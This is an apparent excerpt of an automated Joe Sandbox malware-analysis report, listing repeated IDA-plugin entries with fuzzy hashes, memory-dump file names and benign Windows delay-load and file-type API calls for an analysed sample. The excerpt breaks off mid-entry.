                                              • Instruction ID: b87074f971b57f35c263f5a65aa66b85002a1dc4ad0716a4170bcf4eae435b80
                                              • Opcode Fuzzy Hash: 567bc3bcc64e748589e43fe3e1d2558cc30a1d69065891aba3505837e4ec89df
                                              • Instruction Fuzzy Hash: AED0123520C5E4AED71DBB79DD8A7DC2360B30430CF800515F2618A1A7CF784A50A601
                                              APIs
                                              • GetFileType.KERNELBASE(000000FF,00C9E052,?,?,?,00000000,00C9E5D2,?,?,00000000,?,00000000), ref: 00C9E15E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: FileType
                                              • String ID:
                                              • API String ID: 3081899298-0
                                              • Opcode ID: 2e9c46462f64f5f02b02fa2f2eb1030aeef892fe6310e800b3ef99baf3fa01e0
                                              • Instruction ID: 8bb492cf1e523ae1da146384778460bf8d09e94b026a5de0163ed639f71433ea
                                              • Opcode Fuzzy Hash: 2e9c46462f64f5f02b02fa2f2eb1030aeef892fe6310e800b3ef99baf3fa01e0
                                              • Instruction Fuzzy Hash: 4DC00234400209D68E218A28D88D59D7622AB627A67B8A795D03D895A2C732CE97EA11
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4918
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 104a3d173492ca474b51e6244ae84ce7ebf00cf3226f233734b03384e98c65cf
                                              • Instruction ID: f2a80af36828b103996dac25f008a436374c8a858e1846d365bb705ca0ee68d1
                                              • Opcode Fuzzy Hash: 104a3d173492ca474b51e6244ae84ce7ebf00cf3226f233734b03384e98c65cf
                                              • Instruction Fuzzy Hash: 31B012E169D240FC334C52563D03C7F030EC1C0B50B31472BF004C2543E4404C801031
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4918
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: c39b584cb3fc597096b20291a25c5fbae93aa34c6ec1369fc4a79ee41485ec5d
                                              • Instruction ID: 33b749bdd98d6447facec60ac93f4d4eb9d5e77fc4dd151fb897fd2abfd671a2
                                              • Opcode Fuzzy Hash: c39b584cb3fc597096b20291a25c5fbae93aa34c6ec1369fc4a79ee41485ec5d
                                              • Instruction Fuzzy Hash: 39B012D16AD140FC320C51563D03C7B034FC5C0B50B31472FF004C2543E4404C401031
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4918
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: b1b98f24f425c1efbcf1d350f78d4624feaffc9bb38af258ec6426caeaf78de4
                                              • Instruction ID: 8c17661a22d20a1283d9a8fe048a7b42e5f6a8068c2e494b53731cb2973b043e
                                              • Opcode Fuzzy Hash: b1b98f24f425c1efbcf1d350f78d4624feaffc9bb38af258ec6426caeaf78de4
                                              • Instruction Fuzzy Hash: 17B012E169C180FC320C51563D03C7B030DC1C1B50730872BF405C2143F4404D501131
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4918
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 409e49d2f219dc01e4a505d45abebc28f007f2ab321aeef7004ae7bf926d3277
                                              • Instruction ID: 119e859c23ed131d58d8531b3102ded2aee4f0e5a92b2d54fdcce2a469198dec
                                              • Opcode Fuzzy Hash: 409e49d2f219dc01e4a505d45abebc28f007f2ab321aeef7004ae7bf926d3277
                                              • Instruction Fuzzy Hash: 7CB012D169C140FC320C51A63D03C7B030DC1C0B507308B2FF004C2243E4404C441031
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4918
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 5c5d328aca2ded58adc642b9dd103b4e401981537932359a90aacf04843d9472
                                              • Instruction ID: 27d19762eaf0c6f6aa0a584f5b767657a144ec7c84d0d3be37a1fdca9073a6d7
                                              • Opcode Fuzzy Hash: 5c5d328aca2ded58adc642b9dd103b4e401981537932359a90aacf04843d9472
                                              • Instruction Fuzzy Hash: 37B012E169C280FC334C51563D03C7B030DC1C0B50730472BF005C2143F4404D901031
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4918
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: f4b0d372a3d0891997ddfb27bea824eff48af6580718881420298d3b7acb56d3
                                              • Instruction ID: 80cffc0ba0935566faa18fd9422191dbfcb10c969edb133a336e8bd6a36fdd4e
                                              • Opcode Fuzzy Hash: f4b0d372a3d0891997ddfb27bea824eff48af6580718881420298d3b7acb56d3
                                              • Instruction Fuzzy Hash: 89B012E169C180FC320C51563E03C7B030EC1C0B50730472BF405C2143F4414E521031
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4918
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 30ee5d842a8de198cfdbf545122165c69af10590dcf0e3cb9c52df1ed2d7fe47
                                              • Instruction ID: c109b6bdcba5017517a135d44554936c221e98c498c393abd39e8b0ed8586f0f
                                              • Opcode Fuzzy Hash: 30ee5d842a8de198cfdbf545122165c69af10590dcf0e3cb9c52df1ed2d7fe47
                                              • Instruction Fuzzy Hash: 41B012D169D140FC320C51563D03C7B030EC1C1B50B31873BF404C2583E4404C401131
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4918
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 4be53d8c857c1a64aa7d71403fc4ca13c2eae2005ecc51f619b816f6695b4220
                                              • Instruction ID: 10e645ef12f9cf89e15b0e66e1179de1df8367760432be5bbbbe2be69bf1d6a1
                                              • Opcode Fuzzy Hash: 4be53d8c857c1a64aa7d71403fc4ca13c2eae2005ecc51f619b816f6695b4220
                                              • Instruction Fuzzy Hash: AAB012D569C340FC374C51963D03C7B030DC1C0B50730472BF004C2243E4404C801031
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4918
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 0cb031bb5819cf19a972a733daffea44c1988b2a33c9b5b55a9721fcabb7a9b7
                                              • Instruction ID: 34af52e7245cdbf557d86daa163c79264e7f4d072d0fc1f691846e7772b00959
                                              • Opcode Fuzzy Hash: 0cb031bb5819cf19a972a733daffea44c1988b2a33c9b5b55a9721fcabb7a9b7
                                              • Instruction Fuzzy Hash: 71B012D569C240FC320C51963D03C7B030DC1C0B50730472FF004C2243E4404C401131
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4918
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 729efd1eeb2b6524ceb87c7a8a7dda702d5c1b1648bb59ff7b139a378bcd5746
                                              • Instruction ID: 1ca1e694fd3df3d8f1534aa9368fbbf3c7bfd08c3672382263e4ac2c12d54f03
                                              • Opcode Fuzzy Hash: 729efd1eeb2b6524ceb87c7a8a7dda702d5c1b1648bb59ff7b139a378bcd5746
                                              • Instruction Fuzzy Hash: 69B012D569C340FC320C51963E03C7B030DC1C0B50730472BF404C2243E4414E421031
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4918
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: a1bf79cc0f59b55a592eac880a2fe5011920afcda3b6383d9cdfce22b3dd0502
                                              • Instruction ID: 55209d5f087907584bf55c1d1dd0a85092e2a52fd3138d5d259819bd8f12ce98
                                              • Opcode Fuzzy Hash: a1bf79cc0f59b55a592eac880a2fe5011920afcda3b6383d9cdfce22b3dd0502
                                              • Instruction Fuzzy Hash: ABB012D169C141FC320C55563D03C7B030DC1C1B50730C72BF404C2283E4404C441131
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4B3B
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 67ff1fedb377f0bd59170f82a28e84deec98b822704cf501ce11efe7595b912a
                                              • Instruction ID: 5d90631473b91f02b04355746d69a4d9d276ada753948e12e5e38597f3a7966c
                                              • Opcode Fuzzy Hash: 67ff1fedb377f0bd59170f82a28e84deec98b822704cf501ce11efe7595b912a
                                              • Instruction Fuzzy Hash: 4AB012C225C140FD314C518B1D03D77020EC0C0B10730932FF500C3243E4405C501131
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4C90
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: b0b98ce3c3a4b13e4783513a8c3462997a6d2cf76264812abe02411b20d55713
                                              • Instruction ID: 9f697b6e09cdd84c3319303e1c0265bac499e3dae5c73bf49f7dfbe382cbd976
                                              • Opcode Fuzzy Hash: b0b98ce3c3a4b13e4783513a8c3462997a6d2cf76264812abe02411b20d55713
                                              • Instruction Fuzzy Hash: 6AB012D126D040FC394C51661D02C77030DC1C0F11732833BF400C3143E4400C441131
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4C90
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 3cd43784d7ff388d1bc84167fea650a6d0b5923b3743ec99470c037613c326a7
                                              • Instruction ID: c6cd6e597b5106581e0b910bfbb89f4bc96800ebdfae0d3a048e08c07e4df38e
                                              • Opcode Fuzzy Hash: 3cd43784d7ff388d1bc84167fea650a6d0b5923b3743ec99470c037613c326a7
                                              • Instruction Fuzzy Hash: 3CB012D126D041FC390C51562D02D76030DC1C0F11732433BF000C3543E4400C441031
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4C90
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 7aea722c8202561ebae23d2f681ed1ab6e574d155960bc16a0e7b53a1081b4e0
                                              • Instruction ID: eccb63ef1266ee7496331d257a5265a642018e7d0e1eb35eb03221749bb1f578
                                              • Opcode Fuzzy Hash: 7aea722c8202561ebae23d2f681ed1ab6e574d155960bc16a0e7b53a1081b4e0
                                              • Instruction Fuzzy Hash: E7B012D52AD040FC3D0C11461F02C76030DC9D0F22B32832BF100C2043A4500C421031
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4CF1
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 1ed187d7422d50979a5d4e9825b2a672f2b2566bbcca0b0d610e105c78f424ed
                                              • Instruction ID: 2dd51c9e3e5ccdbfd309d8fdf0e0b4b732269e18645b0c8d769a822e8cb97d37
                                              • Opcode Fuzzy Hash: 1ed187d7422d50979a5d4e9825b2a672f2b2566bbcca0b0d610e105c78f424ed
                                              • Instruction Fuzzy Hash: BDB012C529D241BC324C61461D02C7A062DC0C0F10730433BF004C2143E4411C851031
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4CF1
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
